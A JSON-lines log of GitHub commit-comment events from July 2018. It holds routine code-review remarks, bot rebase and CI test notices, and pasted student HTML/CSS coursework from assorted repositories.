{"id":"8033037174","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871265,"position":null,"line":null,"path":null,"commit_id":"ee63fae3b97df4b0638bed1eacfa8200106e1055","created_at":"2018-07-28T22:59:08Z","updated_at":"2018-07-28T22:59:08Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #12 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:59:08Z"}
{"id":"8033037277","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871266,"position":null,"line":null,"path":null,"commit_id":"28bbdd29484088c67632802288bdb2f8a54f3bc3","created_at":"2018-07-28T22:59:12Z","updated_at":"2018-07-28T22:59:12Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #15 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:59:12Z"}
{"id":"8033037366","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871267,"position":null,"line":null,"path":null,"commit_id":"7de492e7c39e43954ddffbe9cbd580b40aba6bc6","created_at":"2018-07-28T22:59:18Z","updated_at":"2018-07-28T22:59:18Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #17 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:59:18Z"}
{"id":"8033037448","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"kaikuehne/pallas"},"payload":{"comment":{"id":29871268,"position":null,"line":null,"path":null,"commit_id":"fc91b9ab0056a966d4578d6deada3c16daf19351","created_at":"2018-07-28T22:59:22Z","updated_at":"2018-07-28T22:59:22Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #18 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T22:59:22Z"}
{"id":"8033037626","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29871270,"position":34,"line":31,"path":"src/stages/TestingStage.java","commit_id":"f21938717d0afa914ca2dfd1a7728f35e8c61df7","created_at":"2018-07-28T22:59:31Z","updated_at":"2018-07-28T22:59:31Z","author_association":"CONTRIBUTOR","body":"by px/m i mean sprite pixels/m not screen pixels/m"}},"created_at":"2018-07-28T22:59:31Z"}
{"id":"8033038041","type":"CommitCommentEvent","actor":{"login":"cemeyer"},"repo":{"name":"openbsm/openbsm"},"payload":{"comment":{"id":29871273,"position":52,"line":61,"path":"bin/auditd/audit_warn.c","commit_id":"aa0e5f0d99750b70be8086039a442c53e01cf40b","created_at":"2018-07-28T22:59:55Z","updated_at":"2018-07-28T22:59:55Z","author_association":"CONTRIBUTOR","body":"Sure.  Could call out intention in a comment, though."}},"created_at":"2018-07-28T22:59:55Z"}
{"id":"8033041517","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29871284,"position":null,"line":null,"path":null,"commit_id":"1744a3a502209e635bd7664b3e8539bef9376cc4","created_at":"2018-07-28T23:02:58Z","updated_at":"2018-07-28T23:02:58Z","author_association":"CONTRIBUTOR","body":"Brilliant "}},"created_at":"2018-07-28T23:02:58Z"}
{"id":"8033042735","type":"CommitCommentEvent","actor":{"login":"pepibumur"},"repo":{"name":"tuist/xcodeproj"},"payload":{"comment":{"id":29871290,"position":12,"line":39,"path":"Tests/xcodeprojTests/PBXFileElementSpec.swift","commit_id":"fba646bf96bad17e0bc70097f3e3f8c92142a2d4","created_at":"2018-07-28T23:04:07Z","updated_at":"2018-07-28T23:04:07Z","author_association":"CONTRIBUTOR","body":"Just a nit-pick comment. You don't need to wrap the test in a `do {} catch {}` block if you make the test method throw:\r\n\r\n```swift\r\nfunc test_fullPath() throws {\r\n  // Your code\r\n}\r\n```"}},"created_at":"2018-07-28T23:04:07Z"}
{"id":"8033045191","type":"CommitCommentEvent","actor":{"login":"rx4"},"repo":{"name":"rx4/787-9"},"payload":{"comment":{"id":29871300,"position":null,"line":null,"path":null,"commit_id":"f0ea5766b42ef6ba2e6fbeed2435644bc674a8a7","created_at":"2018-07-28T23:06:15Z","updated_at":"2018-07-28T23:06:15Z","author_association":"OWNER","body":"![fgfs-screen-168](https://user-images.githubusercontent.com/38576142/43361293-22534bb0-9280-11e8-9828-dfe95874684b.png)\r\n"}},"created_at":"2018-07-28T23:06:15Z"}
{"id":"8033046767","type":"CommitCommentEvent","actor":{"login":"AWolf81"},"repo":{"name":"AWolf81/guppy"},"payload":{"comment":{"id":29871301,"position":4,"line":23,"path":"src/middlewares/task.middleware.js","commit_id":"765fc31825f9d740972945a741ef0332c71a8858","created_at":"2018-07-28T23:07:44Z","updated_at":"2018-07-28T23:07:44Z","author_association":"OWNER","body":"OK, modified in this [commit](https://github.com/AWolf81/guppy/commit/3db32e56655858ae4a5fef3c58564431d9a2d3f3)."}},"created_at":"2018-07-28T23:07:44Z"}
{"id":"8033047157","type":"CommitCommentEvent","actor":{"login":"TonySaysHi"},"repo":{"name":"TonySaysHi/WarframeCodexPrime"},"payload":{"comment":{"id":29871302,"position":2,"line":2,"path":"README.md","commit_id":"fe02364987780bb6e3adbb76d954ffe29b72fcc2","created_at":"2018-07-28T23:08:05Z","updated_at":"2018-07-28T23:08:05Z","author_association":"OWNER","body":"Oriented Weapon\r\n"}},"created_at":"2018-07-28T23:08:05Z"}
{"id":"8033048508","type":"CommitCommentEvent","actor":{"login":"rx4"},"repo":{"name":"rx4/787-9"},"payload":{"comment":{"id":29871309,"position":null,"line":null,"path":null,"commit_id":"f0ea5766b42ef6ba2e6fbeed2435644bc674a8a7","created_at":"2018-07-28T23:09:25Z","updated_at":"2018-07-28T23:09:25Z","author_association":"OWNER","body":"If you look at the belly of the plane, It is not the right color. I know that is the case with many liveries so I edited just one which saves time. So then I would just do it for one and then do it for more then just that in ONE PULL REQUEST instead"}},"created_at":"2018-07-28T23:09:25Z"}
{"id":"8033051088","type":"CommitCommentEvent","actor":{"login":"dkv8315"},"repo":{"name":"TechPlasma/SyntaxError-UTSA"},"payload":{"comment":{"id":29871317,"position":null,"line":null,"path":null,"commit_id":"290f7a69a02c196ee8082a7dae1d0f485708ed83","created_at":"2018-07-28T23:11:40Z","updated_at":"2018-07-28T23:11:40Z","author_association":"COLLABORATOR","body":"The different fields have regular expressions with ranges to limits to try to limit how many characters for each input field"}},"created_at":"2018-07-28T23:11:40Z"}
{"id":"8033051317","type":"CommitCommentEvent","actor":{"login":"mqudsi"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":29871318,"position":null,"line":null,"path":null,"commit_id":"392cdd4338e8079cd845a79a6cb3c8974d7b9d17","created_at":"2018-07-28T23:11:53Z","updated_at":"2018-07-28T23:11:53Z","author_association":"CONTRIBUTOR","body":"Here's a screenshot:\r\n\r\n![package completions](https://user-images.githubusercontent.com/606923/43361339-b2e7c276-9291-11e8-8872-9b2ec56aaebe.png)\r\n"}},"created_at":"2018-07-28T23:11:53Z"}
{"id":"8033051607","type":"CommitCommentEvent","actor":{"login":"klonos"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29871319,"position":5,"line":11,"path":"core/modules/book/views/views_plugin_argument_default_book_root.inc","commit_id":"1d74ab92efa249776d78c5d8668dc49e756db208","created_at":"2018-07-28T23:12:06Z","updated_at":"2018-07-28T23:12:06Z","author_association":"MEMBER","body":"typo: `lowerComelCase` (`o` in \"Comel\" instead of `a`)"}},"created_at":"2018-07-28T23:12:06Z"}
{"id":"8033055513","type":"CommitCommentEvent","actor":{"login":"Luay85"},"repo":{"name":"HackYourFutureBelgium/github-explorer-Luay85"},"payload":{"comment":{"id":29871339,"position":null,"line":null,"path":null,"commit_id":"be4f10a3285e8bc0802cf5f241f29a562bd3960b","created_at":"2018-07-28T23:16:00Z","updated_at":"2018-07-28T23:16:00Z","author_association":"COLLABORATOR","body":"Hello Gilles,\r\n\r\nFirst of all, thank you so much for your thorough review & feedback of my homework. \r\n\r\n- And about the magic, let me tell you it's in '.selectedIndex' Property. I spent hours & hours on Google looking for something like that, but in-vain.\r\n- The first point you suggested didn't work though. When I do console.log(repo), I get the same old output in the console, but nothing appears on screen.\r\nWill tell you again about this in class."}},"created_at":"2018-07-28T23:16:00Z"}
{"id":"8033057606","type":"CommitCommentEvent","actor":{"login":"lianmw"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29871340,"position":null,"line":null,"path":null,"commit_id":"31e652dbd25ffe42c71191fd44cff07216c41b72","created_at":"2018-07-28T23:18:06Z","updated_at":"2018-07-28T23:18:06Z","author_association":"NONE","body":"it doesn't work in pubg but on desktop ,i make something wrong?"}},"created_at":"2018-07-28T23:18:06Z"}
{"id":"8033058197","type":"CommitCommentEvent","actor":{"login":"doctorwho1998"},"repo":{"name":"doctorwho1998/C_programs"},"payload":{"comment":{"id":29871341,"position":23,"line":23,"path":"trocarPalavra_changeWord","commit_id":"27c4b0451737196429d156a7c93fd517c3ffa8ee","created_at":"2018-07-28T23:18:46Z","updated_at":"2018-07-28T23:18:46Z","author_association":"OWNER","body":"/*"}},"created_at":"2018-07-28T23:18:46Z"}
{"id":"8033058496","type":"CommitCommentEvent","actor":{"login":"doctorwho1998"},"repo":{"name":"doctorwho1998/C_programs"},"payload":{"comment":{"id":29871346,"position":25,"line":25,"path":"trocarPalavra_changeWord","commit_id":"27c4b0451737196429d156a7c93fd517c3ffa8ee","created_at":"2018-07-28T23:19:03Z","updated_at":"2018-07-28T23:19:03Z","author_association":"OWNER","body":"/*"}},"created_at":"2018-07-28T23:19:03Z"}
{"id":"8033059130","type":"CommitCommentEvent","actor":{"login":"wyattpaq14"},"repo":{"name":"JustAnotherChatClient/JaC2"},"payload":{"comment":{"id":29871347,"position":null,"line":null,"path":null,"commit_id":"871c0dba315ce859a479fa1d19de776ce5692538","created_at":"2018-07-28T23:19:43Z","updated_at":"2018-07-28T23:19:43Z","author_association":"CONTRIBUTOR","body":"https://www.npmjs.com/package/express-basic-auth"}},"created_at":"2018-07-28T23:19:43Z"}
{"id":"8033060348","type":"CommitCommentEvent","actor":{"login":"manucorporat"},"repo":{"name":"ionic-team/ionic"},"payload":{"comment":{"id":29871357,"position":6,"line":24,"path":"angular/src/directives/navigation/ion-router-outlet.ts","commit_id":"266336effef55aa539b78dd62880a6edf4faa8d0","created_at":"2018-07-28T23:20:59Z","updated_at":"2018-07-28T23:20:59Z","author_association":"MEMBER","body":"I am stupid, thanks @masimplo!"}},"created_at":"2018-07-28T23:20:59Z"}
{"id":"8033070798","type":"CommitCommentEvent","actor":{"login":"CSamboni"},"repo":{"name":"CSamboni/see-plus"},"payload":{"comment":{"id":29871399,"position":null,"line":null,"path":null,"commit_id":"1bf49315cc0da01de32c2ae0ba050487553a891b","created_at":"2018-07-28T23:31:33Z","updated_at":"2018-07-28T23:31:33Z","author_association":"OWNER","body":"Reestructurando"}},"created_at":"2018-07-28T23:31:33Z"}
{"id":"8033076248","type":"CommitCommentEvent","actor":{"login":"killer00760"},"repo":{"name":"asqsa1/capstone"},"payload":{"comment":{"id":29871412,"position":8,"line":18,"path":"README","commit_id":"bbb6b9e2f898ddaf352ae4c3207f0737805940b0","created_at":"2018-07-28T23:36:47Z","updated_at":"2018-07-28T23:36:47Z","author_association":"NONE","body":"Lua"}},"created_at":"2018-07-28T23:36:47Z"}
{"id":"8033076448","type":"CommitCommentEvent","actor":{"login":"adamlaughlin"},"repo":{"name":"TechFortress/PopulationDensity"},"payload":{"comment":{"id":29871413,"position":null,"line":null,"path":null,"commit_id":"128baeb821cc51a3205b51bb0390b0bb5858af7b","created_at":"2018-07-28T23:36:59Z","updated_at":"2018-07-28T23:36:59Z","author_association":"NONE","body":"@FrankHeijden This brings me great happiness, I can't be alone, thank you and @RoboMWM for keeping this fresh.  \"An oldie but a goodie.\""}},"created_at":"2018-07-28T23:36:59Z"}
{"id":"8033077686","type":"CommitCommentEvent","actor":{"login":"almchung"},"repo":{"name":"processing/p5.js"},"payload":{"comment":{"id":29871415,"position":34,"line":818,"path":"lib/addons/p5.dom.js","commit_id":"9861416d4fb085cb891d5cd1a7be1070a68b2c20","created_at":"2018-07-28T23:38:11Z","updated_at":"2018-07-28T23:38:11Z","author_association":"CONTRIBUTOR","body":"@TanviKumar I was refering to a solution to just use the existing `value()` method instead of adding a new method. The way I suggested (omitting the last the `toString()` conversion part), calling `value()` would return a p5.Color object. I agree that adding a method named `color()` is actually an intuitive solution, but since all other elements in the library use `value()` anyway I thought it would be advantageous to follow the convention. What do you think?"}},"created_at":"2018-07-28T23:38:11Z"}
{"id":"8033077749","type":"CommitCommentEvent","actor":{"login":"Kronuz"},"repo":{"name":"xapian/xapian"},"payload":{"comment":{"id":29871416,"position":null,"line":null,"path":null,"commit_id":"3d1771612c97823d14adf4a3579e7942e7c839fb","created_at":"2018-07-28T23:38:14Z","updated_at":"2018-07-28T23:38:14Z","author_association":"CONTRIBUTOR","body":"YAY!! Great! Thank you! :)"}},"created_at":"2018-07-28T23:38:14Z"}
{"id":"8033079259","type":"CommitCommentEvent","actor":{"login":"AngelaJones313"},"repo":{"name":"AngelaJones313/courseratest"},"payload":{"comment":{"id":29871420,"position":null,"line":null,"path":null,"commit_id":"7d3788f9d245ac9f36d14398a36d69db9b16ce96","created_at":"2018-07-28T23:39:51Z","updated_at":"2018-07-28T23:39:51Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html>\r\n<head>\r\n\t<meta charset=\"utf-8\">\r\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\r\n<title>Today's Menu</title>\r\n<style>\r\n<link rel=\"stylesheet\" href=\"module2_solution.css\">\r\n\r\n/********** Base styles **********/\r\n}\r\nh1 {\r\n  margin-bottom: 15px;\r\n}\r\np {\r\n  border: 1px solid black;\r\n  background: #A52A2A;\r\n  width: 90%;\r\n  height: 150px;\r\n  margin-right: auto;\r\n  margin-left: auto;\r\n  color: white;\r\n}\r\n/* Simple Responsive Framework. */\r\n.row {\r\n  width: 100%;\r\n}\r\n/********** Large devices only **********/\r\n@media (min-width: 992px) and (max-width: 1199px) {\r\n  .col-lg-1, .col-lg-2, .col-lg-3, {\r\n    float: left;\r\n    border: 1px solid green;\r\n  }\r\n  .col-lg-1 {\r\n    width: 8.33%;\r\n  }\r\n  .col-lg-2 {\r\n    width: 16.66%;\r\n  }\r\n  .col-lg-3 {\r\n    width: 25%;\r\n  \r\n  }\r\n}\r\n/********** Medium devices only **********/\r\n@media (min-width: 768px) and (max-width: 990px) {\r\n  .col-md-1, .col-md-2, .col-md-3, {\r\n    float: left;\r\n    border: 1px solid green;\r\n  }\r\n  .col-md-1 {\r\n    width: 8.33%;\r\n  }\r\n  .col-md-2 {\r\n    width: 16.66%;\r\n  }\r\n  .col-md-3 {\r\n    width: 25%;\r\n  }\r\n  \r\n}\r\n@media (max-width: 767px) {\r\n  .col-sm-1, .col-sm-2, .col-sm-3, {\r\n    float: left;\r\n    border: 1px solid green;\r\n  }\r\n  .col-sm-1 {\r\n    width: 8.33%;\r\n  }\r\n  .col-sm-2 {\r\n    width: 16.66%;\r\n  }\r\n  .col-sm-3 {\r\n    width: 25%;\r\n  }\r\n }\r\n\r\n</style>\r\n</head>\r\n<body>\r\n\r\n<div class=\"row\">\r\n  <div class=\"col-lg-3 col-md-6\"><p>Item 1</p></div>\r\n  <div class=\"col-lg-3 col-md-6\"><p>Item 2</p></div>\r\n  <div class=\"col-lg-3 col-md-6\"><p>Item 3</p></div>\r\n  <div class=\"col-lg-3 col-md-6\"><p>Item 4</p></div>\r\n  <div class=\"col-lg-3 col-md-6\"><p>Item 5</p></div>\r\n  <div class=\"col-lg-3 col-md-6\"><p>Item 6</p></div>\r\n  <div class=\"col-lg-3 col-md-6\"><p>Item 7</p></div>\r\n  <div class=\"col-lg-3 col-md-6\"><p>Item 8</p></div>\r\n</div>\r\n<div class=\"column\">\r\n\t\t<h2>Vegan</h2>\r\n\t\t<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Sequi ratione architecto necessitatibus cum praesentium dolor totam voluptatibus recusandae?</p>\r\n\t</div>\r\n\t\r\n\t<div class=\"column\">\r\n\t\t<h2>Chicken</h2>\r\n\t\t<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Sequi ratione architecto necessitatibus cum praesentium dolor totam voluptatibus recusandae? Illo quod nemo ratione itaque dolores laudantium error vero laborum blanditiis nostrum.</p>\r\n\t</div>\r\n  \r\n  <div class=\"column\">\r\n\t\t<h2>Seafood</h2>\r\n\t\t<p>Illo quod nemo ratione itaque dolores laudantium error vero laborum blanditiis nostrum. Lorem ipsum dolor sit amet consectetur adipisicing elit. Sequi ratione architecto cum praesentium voluptatibus recusandae?</p>\r\n\t</div>\r\n\t\r\n</section>\t\r\n</body>\r\n</html>\r\n"}},"created_at":"2018-07-28T23:39:51Z"}
{"id":"8033080670","type":"CommitCommentEvent","actor":{"login":"jfamousket"},"repo":{"name":"jfamousket/SparkLand"},"payload":{"comment":{"id":29871424,"position":null,"line":null,"path":null,"commit_id":"71d5bd6116856bf234bffcd6febe3963bedd3c60","created_at":"2018-07-28T23:41:17Z","updated_at":"2018-07-28T23:41:17Z","author_association":"OWNER","body":"resolved the issue forget the comment on the top of this commit"}},"created_at":"2018-07-28T23:41:17Z"}
{"id":"8033080746","type":"CommitCommentEvent","actor":{"login":"AngelaJones313"},"repo":{"name":"AngelaJones313/courseratest"},"payload":{"comment":{"id":29871425,"position":null,"line":null,"path":null,"commit_id":"7d3788f9d245ac9f36d14398a36d69db9b16ce96","created_at":"2018-07-28T23:41:22Z","updated_at":"2018-07-28T23:41:22Z","author_association":"OWNER","body":"(CSS file) \r\n* { box-sizing: border-box; }\r\n\r\nbody { \r\n  font-family: 'Tahoma, Geneva, sans-serif\r\n  color: \t#2E8B57;\r\n}\r\n\r\n\r\n.wrapper {\r\n\tpadding: 5px;\r\n\tmax-width: 960px;\r\n\twidth: 95%;\r\n\tmargin: 20px auto;\r\n}\r\nheader {\r\n\tpadding: 0 15px;\r\n}\r\n\r\n.columns {\r\n\tdisplay: flex;\r\n\tflex-flow: row wrap;\r\n\tjustify-content: center;\r\n\tmargin: 5px 0;\r\n}\r\n\r\n.column {\r\n\tflex: 1;\r\n\tborder: 1px solid gray;\r\n\tmargin: 2px;\r\n\tpadding: 10px;\r\n\t&:first-child { margin-left: 0; }\r\n\t&:last-child { margin-right: 0; }\r\n\t\r\n}\r\n\r\nfooter {\r\n\tpadding: 0 15px;\r\n}\r\n\r\n\r\n@media screen and (max-width: 980px) {\r\n  .columns .column {\r\n\t\tmargin-bottom: 5px;\r\n    flex-basis: 40%;\r\n\t\t&:nth-last-child(2) {\r\n\t\t\tmargin-right: 0;\r\n\t\t}\r\n\t\t&:last-child {\r\n\t\t\tflex-basis: 100%;\r\n\t\t\tmargin: 0;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n@media screen and (max-width: 680px) {\r\n\t.columns .column {\r\n\t\tflex-basis: 100%;\r\n\t\tmargin: 0 0 5px 0;\r\n\t}\r\n}"}},"created_at":"2018-07-28T23:41:22Z"}
{"id":"8033090292","type":"CommitCommentEvent","actor":{"login":"Norgus"},"repo":{"name":"07th-mod/himatsubushi"},"payload":{"comment":{"id":29871458,"position":null,"line":null,"path":null,"commit_id":"39c40d41ccc838c570fd6b16a2c19ccee67b3a54","created_at":"2018-07-28T23:51:32Z","updated_at":"2018-07-28T23:51:32Z","author_association":"CONTRIBUTOR","body":"@orian34 pointed out that the English didn't work very well (impossible to tell who was meant by \"he\" and \"his\"), I read and re-read this part, checking mahjong rule websites to get a better understanding.\r\n\r\nAfter consideration, I think these changes make sense, but I'm still very naive to mahjong, so open to further corrections on this..."}},"created_at":"2018-07-28T23:51:32Z"}
{"id":"8033097158","type":"CommitCommentEvent","actor":{"login":"BigForest"},"repo":{"name":"infinitystation/Baystation12"},"payload":{"comment":{"id":29871467,"position":null,"line":null,"path":null,"commit_id":"731e272c7e75e7de8e5e512b4b8c078fabf70d5e","created_at":"2018-07-28T23:58:50Z","updated_at":"2018-07-28T23:58:50Z","author_association":"NONE","body":"Лол, а кто это такой умный туда вообще сет нейм писал?"}},"created_at":"2018-07-28T23:58:50Z"}
{"id":"8033097596","type":"CommitCommentEvent","actor":{"login":"JoseMiguelHerrera"},"repo":{"name":"PolymathNetwork/polymath-issuer"},"payload":{"comment":{"id":29871468,"position":null,"line":null,"path":null,"commit_id":"1639bc1e0edc7c7a1f32918a9b19a819b4833875","created_at":"2018-07-28T23:59:19Z","updated_at":"2018-07-28T23:59:19Z","author_association":"NONE","body":"I don't think this will work, did you test it? I want to show the modal when it freezes but I do t want to hide it when it unfreezes... That's done elsewhere."}},"created_at":"2018-07-28T23:59:19Z"}
{"id":"8031543106","type":"CommitCommentEvent","actor":{"login":"whoisj"},"repo":{"name":"mminns/Git-Credential-Manager-for-Windows"},"payload":{"comment":{"id":29866031,"position":21,"line":72,"path":"Bitbucket.Authentication/Src/OAuth/SimpleServer.cs","commit_id":"6bb43d320341a0680a5c758935abf02e598e8559","created_at":"2018-07-28T03:00:28Z","updated_at":"2018-07-28T03:00:28Z","author_association":"NONE","body":"This does not do what you think it does. `Task.Delay` is a tragically bad API which does __not__ replace `Thread.Sleep` or `Thread.SpinWait` by any stretch of the imagination.\r\n\r\nWhen a thread enters `Task.Delay` it yields to the scheduler, then tells the scheduler to schedule a number of milliseconds wait operation. Given the 16 ms granularity of the task-scheduler, in no sooner than 16 + 112 milliseconds the scheduler will queue a continuation of your method. Now, after another 16 milliseconds (at soonest) your continuation will start. 3 thread hops, 4 context stores, 3 context restores, and at least 144 milliseconds later you're done waiting for 100 ms.\r\n\r\nBetter to use `Thread.Sleep` here."}},"created_at":"2018-07-28T03:00:28Z"}
{"id":"8031543248","type":"CommitCommentEvent","actor":{"login":"GuoZhaoHui628"},"repo":{"name":"ZHENFENG13/My-Blog"},"payload":{"comment":{"id":29866032,"position":null,"line":null,"path":null,"commit_id":"528af45a56c3d6d06fdccecc1789e776c9710991","created_at":"2018-07-28T03:00:35Z","updated_at":"2018-07-28T03:00:35Z","author_association":"NONE","body":"嗨 博主们！解决办法见底部。\r\ndebug试了下这块代码，发现计算点击量这会“增量”。\r\n因为下面这行代码\r\n```\r\n       cache.hset(\"article\" + cid, \"hits\", 1);\r\n```\r\n当将最新的点击量更新到数据库后，这里应该将缓存数据重新清零，而不是设置为1，因为下面这三元运算符这，当不为 null 时会变成 1+1，实际上只是重新浏览一次，却叠加成 2\r\n```\r\nhits = null == hits ? 1 : hits + 1;\r\n```\r\n刚好你这里从缓存中取的尺度是 10\r\n```\r\n /**\r\n   * 点击次数超过多少更新到数据库\r\n */\r\npublic static final int HIT_EXCEED = 10;\r\n```\r\n说明这里代码计算出来的浏览器每 10 次会多一次。\r\n--------------------------------我是华丽分割线--------------------------------------\r\n**上面懒得看的各位直接看这里解决吧。**\r\n这里作者为了减少数据库的操作，设置了更新数据库点击量的缓存标准是 10 。但是新手网站浏览量太低了 :)\r\n这里我们将如下代码改成 3-5 会好点。\r\n```\r\n /**\r\n   * 点击次数超过多少更新到数据库\r\n */\r\npublic static final int HIT_EXCEED = 4;\r\n```\r\nok 解决。有兴趣交流、友链的 戳这 [奇异博士--真&自由门](http://guozh.net/)"}},"created_at":"2018-07-28T03:00:35Z"}
{"id":"8031546830","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866055,"position":null,"line":null,"path":null,"commit_id":"be848eff013c959e0eefed9511197efc2da77d27","created_at":"2018-07-28T03:03:35Z","updated_at":"2018-07-28T03:03:35Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2992 of 2996 tests passed, 0 test warnings)\n\nMessages:\n\n * 4 tests had: EIO diffs.\n * 4 tests had: ESO big diffs.\n * 4 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 639\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.png)</a> \n"}},"created_at":"2018-07-28T03:03:35Z"}
{"id":"8031547493","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866063,"position":null,"line":null,"path":null,"commit_id":"6d3facc741cab8cd093a7affcddacee8abb6832d","created_at":"2018-07-28T03:04:12Z","updated_at":"2018-07-28T03:04:12Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 77 test warnings)\n\nMessages:\n\n * 77 tests had: EIO diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-28T03:04:12Z"}
{"id":"8031549217","type":"CommitCommentEvent","actor":{"login":"gh843260227"},"repo":{"name":"gh843260227/leet"},"payload":{"comment":{"id":29866066,"position":null,"line":null,"path":null,"commit_id":"54b654488ee1513d185abafdeacc452ef830eaaf","created_at":"2018-07-28T03:05:38Z","updated_at":"2018-07-28T03:05:38Z","author_association":"OWNER","body":"void strstr(char p)\r\n {\r\n      int ;"}},"created_at":"2018-07-28T03:05:38Z"}
{"id":"8031552719","type":"CommitCommentEvent","actor":{"login":"Moadptc"},"repo":{"name":"Moadptc/anotherTest"},"payload":{"comment":{"id":29866072,"position":null,"line":null,"path":null,"commit_id":"6785a6a6306196ab9841ddbdccf582cd69c71a81","created_at":"2018-07-28T03:08:54Z","updated_at":"2018-07-28T03:08:54Z","author_association":"OWNER","body":"nice work bro "}},"created_at":"2018-07-28T03:08:54Z"}
{"id":"8031552921","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866073,"position":null,"line":null,"path":null,"commit_id":"be848eff013c959e0eefed9511197efc2da77d27","created_at":"2018-07-28T03:09:05Z","updated_at":"2018-07-28T03:09:05Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-28T03:09:05Z"}
{"id":"8031553857","type":"CommitCommentEvent","actor":{"login":"xuwei-k"},"repo":{"name":"scala/community-builds"},"payload":{"comment":{"id":29866085,"position":5,"line":290,"path":"configs/community.dbuild","commit_id":"758798f133ede39b8a7933e014b78d237ce40d30","created_at":"2018-07-28T03:09:47Z","updated_at":"2018-07-28T03:09:47Z","author_association":"CONTRIBUTOR","body":"`compat213` ?\r\n\r\nhttps://scala-ci.typesafe.com/job/scala-2.13.x-integrate-community-build/1274/consoleFull\r\n\r\n```\r\n[scalikejdbc] [error] **** Missing dependency: the library org.scala-lang.modules#scala-collection-compat is not provided (in space \"scala.main\") by any project in this configuration file.\r\n```\r\n\r\n```\r\n[kxbmap-configs] [error] **** Missing dependency: the library org.scala-lang.modules#scala-collection-compat is not provided (in space \"scala.main\") by any project in this configuration file.\r\n```"}},"created_at":"2018-07-28T03:09:47Z"}
{"id":"8031560427","type":"CommitCommentEvent","actor":{"login":"evmar"},"repo":{"name":"evmar/j8t"},"payload":{"comment":{"id":29866096,"position":10,"line":105,"path":"src/bind.rs","commit_id":"2744cd8f00506e5ed7668a2564c3c1ec20051e7d","created_at":"2018-07-28T03:14:19Z","updated_at":"2018-07-28T03:14:19Z","author_association":"OWNER","body":"The only way to be sure is to write a real program in it!"}},"created_at":"2018-07-28T03:14:19Z"}
